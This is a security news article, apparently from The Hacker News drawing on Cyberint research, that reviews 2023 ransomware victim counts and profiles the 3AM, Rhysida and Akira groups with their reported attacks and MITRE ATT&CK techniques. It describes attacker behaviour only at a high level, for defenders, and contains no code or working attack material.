Security
Headlines
HeadlinesLatestCVEs

Headline

3 Ransomware Group Newcomers to Watch in 2024

The ransomware industry surged in 2023 as it saw an alarming 55.5% increase in victims worldwide, reaching a staggering 4,368 cases. Figure 1: Year over year victims per quarter The rollercoaster ride from explosive growth in 2021 to a momentary dip in 2022 was just a teaser—2023 roared back with the same fervor as 2021, propelling existing groups and ushering in a wave of formidable

The Hacker News
#vulnerability#web#windows#linux#git#php#auth#sap#The Hacker News

The ransomware industry surged in 2023 as it saw an alarming 55.5% increase in victims worldwide, reaching a staggering 4,368 cases.

Figure 1: Year over year victims per quarter

The rollercoaster ride from explosive growth in 2021 to a momentary dip in 2022 was just a teaser—2023 roared back with the same fervor as 2021, propelling existing groups and ushering in a wave of formidable newcomers.

Figure 2: 2020-2023 ransomware victim count

LockBit 3.0 maintained its number one spot with 1047 victims achieved through the Boeing attack, the Royal Mail Attack, and more. Alphv and Cl0p achieved far less success, with 445 and 384 victims attributed to them, respectively, in 2023.

Figure 3: Top 3 active ransomware groups in 2023

These 3 groups were heavy contributors to the boom in ransomware attacks in 2023, but they were not the sole groups responsible. Many attacks came from emerging ransomware gangs such as 8Base, Rhysida, 3AM, Malaslocker, BianLian, Play, Akira, and others.

Newcomers to the Ransomware Industry

At Cyberint, the research team is constantly researching the latest ransomware groups and analyzing them for potential impact. This blog will look at 3 new players in the industry, examine their impact in 2023 and delve into their TTPs.

To learn about other new players download the 2023 Ransomware Report here.****3AM Ransomware

A newly discovered ransomware strain named 3AM has emerged, but its usage has been limited so far. In 2023 they have only managed to impact 20+ organizations (mostly in the USA). However, they are gaining notoriety due to a ransomware affiliate who tried to deploy LockBit on a target’s network switching to 3AM when LockBit was blocked.

New ransomware families appear frequently, and most disappear just as quickly or never manage to gain significant traction. However, the fact that 3AM was used as a fallback by a LockBit affiliate suggests that it may be of interest to attackers and could be seen again in the future.

Interestingly, 3AM is coded in Rust and appears to be an entirely new malware family. It follows a specific sequence: it attempts to halt multiple services on the compromised computer before initiating the file encryption process. After completing encryption, it tries to erase Volume Shadow (VSS) copies. Any potential links between its authors and known cybercrime organizations remain unclear.

Figure 4: 3AM Leaked Data

The threat actor’s suspicious activities commenced with the utilization of the gpresult command to extract policy settings enforced on the computer for a specific user. Subsequently, they executed various components of Cobalt Strike and made efforts to elevate privileges on the computer using PsExec.

Following this, the attackers conducted reconnaissance through commands such as whoami, netstat, quser, and net share. They also attempted to identify other servers for lateral movement using the quser and net view commands. In addition, they established a new user account to maintain persistence and employed the Wput tool to transfer the victims’ files to their FTP server.

The utilization of the Yugeon Web Clicks script from 2004 may appear perplexing at first glance. It raises questions about why an emerging ransomware group would opt for such outdated technology. However, there are several potential reasons for this choice, including:

  1. Obscurity: Older scripts and technologies may not be as commonly recognized by modern security tools, reducing the likelihood of detection.
  2. Simplicity: Older scripts might provide straightforward functionality without the complexities often associated with modern counterparts, making deployment and management easier.
  3. Overconfidence: The group may possess a high level of confidence in their abilities and may not see the necessity of investing in more advanced technology, particularly for their website.

It’s essential to note that this choice exposes the group to certain risks. Employing outdated technology with known vulnerabilities can render their operations vulnerable to external attacks, countermeasures, or potential sabotage by other threat actors.

The 3AM ransomware group’s choice of employing an outdated PHP script is a testament to the unpredictable nature of cybercriminals. Despite their use of advanced ransomware strains for targeting organizations, their selection of backend technologies may be influenced by a combination of strategic considerations, convenience, and overconfidence. It underscores the importance for organizations to remain vigilant and adopt a holistic security approach, recognizing that threats can emerge from both state-of-the-art and antiquated technologies.

Known TTPs

Tools

Tactics

Resource Development

T1650 - Acquire Access

Collection

T1560 - Archive Collected Data

Impact

T1565.001 - Stored Data Manipulation

Collection

T1532 - Archive Collected Data

Collection

T1005 - Data from Local System

Rhysida Ransomware

The Rhysida ransomware group came into the spotlight in May/June 2023 when they launched a victim support chat portal accessible through their TOR (.onion) site. They claim to be a “Cybersecurity team” acting in their victims’ best interests, targeting their systems and highlighting vulnerabilities.

In June, Rhysida drew attention after publicly disclosing stolen Chilean Arm documents from their data leak site. The group has since gained notoriety due to their attacks on healthcare institutions, including Prospect Medical Holdings., leading government agencies and cybersecurity firms to track them closely. They have targeted several high-profile entities, including the British Library, where they caused a major technology outage and sold stolen PII online, and Insomniac Games, a Sony-owned video game developer. They have demonstrated broad reach across diverse industries.

Known TTPs

Tools

Tactics

Privilege Escalation

T1055.003 - Thread Execution Hijacking

Privilege Escalation

T1547.001 - Registry Run Keys / Startup Folder

Privilege Escalation

T1055 - Process Injection

Privilege Escalation

T1548.002 - Bypass User Account Control

Defense Evasion

T1036 - Masquerading

Defense Evasion

T1027.005 - Indicator Removal from Tools

Defense Evasion

T1027 - Obfuscated Files or Information

Defense Evasion

T1620 - Reflective Code Loading

Defense Evasion

T1564.004 - NTFS File Attributes

Defense Evasion

T1497-Virtualization/Sandbox Evasion

Defense Evasion

T1564 - Hide Artifacts

Discovery

T1083 - File and Directory Discovery

Discovery

T1010 - Application Window Discovery

Discovery

T1082 - System Information Discovery

Discovery

T1057 - Process Discovery

Discovery

T1518.001 - Security Software Discovery

Initial Access

T1566-Phishing

Collection

T1005 - Data from Local System

Collection

T1119 - Automated Collection

Resource Development

T1587 - Develop Capabilities

Resource Development

T1583-Acquire Infrastructure

Execution

T1129 - Shared Modules

Execution

T1059 - Command and Scripting Interpreter

Reconnaissance

T1595- Active Scanning

Reconnaissance

T1598-Phishing for Information

The Akira Group

The Akira Group, was discovered in March 2023 and has claimed 81 victims to date. Preliminary research suggests a strong connection between the group and the notorious ransomware group, Conti. The leaking of Conti’s source code has led to multiple threat actors utilizing Conti’s code to construct or adapt their own, making it challenging to determine which groups have connections to Conti and which are just utilizing the leaked code.

However, Akira does provide certain telltale clues suggesting a connection to Conti, ranging from similarities in their approach to the disregard for the same file types and directories, as well as the incorporation of comparable functions. Furthermore, Akira utilizes the ChaCha algorithm for file encryption, implemented in a manner akin to Conti ransomware. Lastly, the individuals behind the Akira ransomware directed complete ransom payments to addresses associated with the Conti group.

Akira offers ransomware-as-a-service, affecting both Windows and Linux systems. They utilize their official DLS (data leak site) to publish information about their victims and updates regarding their activities. The threat actors primarily concentrate on the US, although they also target the UK, Australia, and other countries.

They exfiltrate and encrypt data to coerce victims into paying a double ransom, both to regain access and to restore their files. In almost all instances of intrusion, Akira has capitalized on compromised credentials to gain their initial foothold within the victim’s environment. Interestingly, most of the targeted organizations had neglected to implement multi-factor authentication (MFA) for their VPNs. While the exact origin of these compromised credentials remains uncertain, there is a possibility that the threat actors procured access or credentials from the dark web.

Known TTPs

Tools

Tactics

Exfiltration

T1567 - Exfiltration Over Web Service

Initial Access

T1566.001 - Spearphishing Attachment

Exfiltration

T1041 - Exfiltration Over C2 Channel

Exfiltration

T1537 - Transfer Data to Cloud Account

Collection

T1114.001 - Local Email Collection

Impact

T1486 - Data Encrypted for Impact

Initial Access

T1566.002 - Spearphishing Link

Execution

T1059.001 - PowerShell

Execution

T1569.002 - Service Execution

Discovery

T1016.001 - Internet Connection Discovery

Initial Access

T1078 - Valid Accounts

Privilege Escalation

T1078 - Valid Accounts

Defense Evasion

T1078 - Valid Accounts

Persistence

T1078 - Valid Accounts

Privilege Escalation

T1547.009 - Shortcut Modification

Persistence

T1547.009 - Shortcut Modification

Initial Access

T1190 - Exploit Public-Facing Application

Defense Evasion

T1027.001 - Binary Padding

Exfiltration

T1029 - Scheduled Transfer

Execution

T1059.003 - Windows Command Shell

Initial Access

T1195 - Supply Chain Compromise

Defense Evasion

T1036.005 - Match Legitimate Name or Location

Privilege Escalation

T1547.001 - Registry Run Keys / Startup Folder

Persistence

T1547.001 - Registry Run Keys / Startup Folder

Exfiltration

T1020 - Automated Exfiltration

The ransomware industry is burgeoning, attracting new and bold groups seeking to make a name for themselves by developing high-quality ransomware services and tools. In 2024, Cyberint anticipates several of these newer groups to enhance their capabilities and emerge as dominant players in the industry alongside veteran groups like LockBit 3.0, Cl0p, and AlphV.

Read Cyberint’s 2023 Ransomware Report for the top targeted industries and countries, a breakdown of the top 3 ransomware groups, ransomware families worth noting, newcomers to the industry, notable 2023 campaigns, and 2024 forecasts.

****Read the report to gain detailed insights and more.****

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.

The Hacker News: Latest News

Google Exposes GLASSBRIDGE: A Pro-China Influence Network of Fake News Sites